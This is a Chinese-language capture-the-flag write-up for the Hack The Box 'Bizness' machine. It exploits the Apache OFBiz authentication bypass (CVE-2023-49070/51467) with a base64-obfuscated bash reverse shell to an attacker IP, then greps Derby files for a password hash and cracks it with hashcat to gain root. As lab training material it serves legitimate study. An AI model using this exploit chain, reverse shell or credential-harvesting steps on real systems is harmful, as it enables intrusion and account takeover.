HTB-bizness-wp

信息收集

nmap 扫描 常规开放端口22, 80, 443

dirsearch 后收集到一些路由/content, /accounting, /control 但都会跳转到登录界面

img

从右下角可以看到用的框架是 Apache OFBiz. Release 18.12

搜索可以发现(CVE-2023-49070 and CVE-2023-51467)

以及攻击利用的payload https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass/blob/master/exploit.py

漏洞利用

下载https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass/blob/master/exploit.py和https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar 之后 执行命令

1
2
3
4
python3 exploit.py --url https://bizness.htb/ --cmd 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMjQvOTExMSAwPiYxCg==}|{base64,-d}|{bash,-i}'

# 这里的YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMjQvOTExMSAwPiYxCg==为'bash -i >& /dev/tcp/10.10.14.124/9111 0>&1'的base64编码
# 另外开一个terminal nc -lvnp 9111

即可获得反弹shell

权限提升

下载linpeas.sh 执行后发现有derby 筛选所有相关的dat文件内容 find / -name "*.dat" 进入到目录/opt/ofbiz/runtime/data/derby/ofbiz/seg0

1
grep -arion -E '(\w+\W+){0,5}password(\W+\w+){0,5}'

可以得到一个可疑哈希 $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I

这里为SHA1哈希 且salt为d , _换成/, -换成+

用cyberchef从base64转到hex得到 b8fd3f41a541a435857a8f3e751cc3a91c174362

接着用hashcat爆破 hash文件内容:b8fd3f41a541a435857a8f3e751cc3a91c174362:d

1
hashcat -m 120 -a 0 hash /usr/share/wordlists/rockyou.txt

得到结果 密码即为monkeybizness

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
b8fd3f41a541a435857a8f3e751cc3a91c174362:d:monkeybizness  
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 120 (sha1($salt.$pass))
Hash.Target......: b8fd3f41a541a435857a8f3e751cc3a91c174362:d
Time.Started.....: Thu Jan 11 23:10:55 2024 (13 secs)
Time.Estimated...: Thu Jan 11 23:11:08 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3346.2 kH/s (0.09ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1478656/14344385 (10.31%)
Rejected.........: 0/1478656 (0.00%)
Restore.Point....: 1477632/14344385 (10.30%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: montano13 -> monkey-moo
Hardware.Mon.#1..: Util: 43%

su切换为root 密码输入monkeybizness 成功提权

本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP